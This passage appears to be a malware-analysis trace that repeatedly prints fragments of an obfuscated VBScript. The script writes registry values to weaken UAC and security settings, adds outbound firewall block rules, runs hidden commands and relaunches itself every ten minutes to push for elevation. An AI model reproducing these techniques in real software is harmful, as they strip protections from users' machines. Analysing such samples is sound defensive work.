newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.370] wcsncmp (_String1="on = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.370] wcsncmp (_String1="n = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.370] wcsncmp (_String1=" = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.370] wcsncmp (_String1="= bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.370] wcsncmp (_String1=" bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 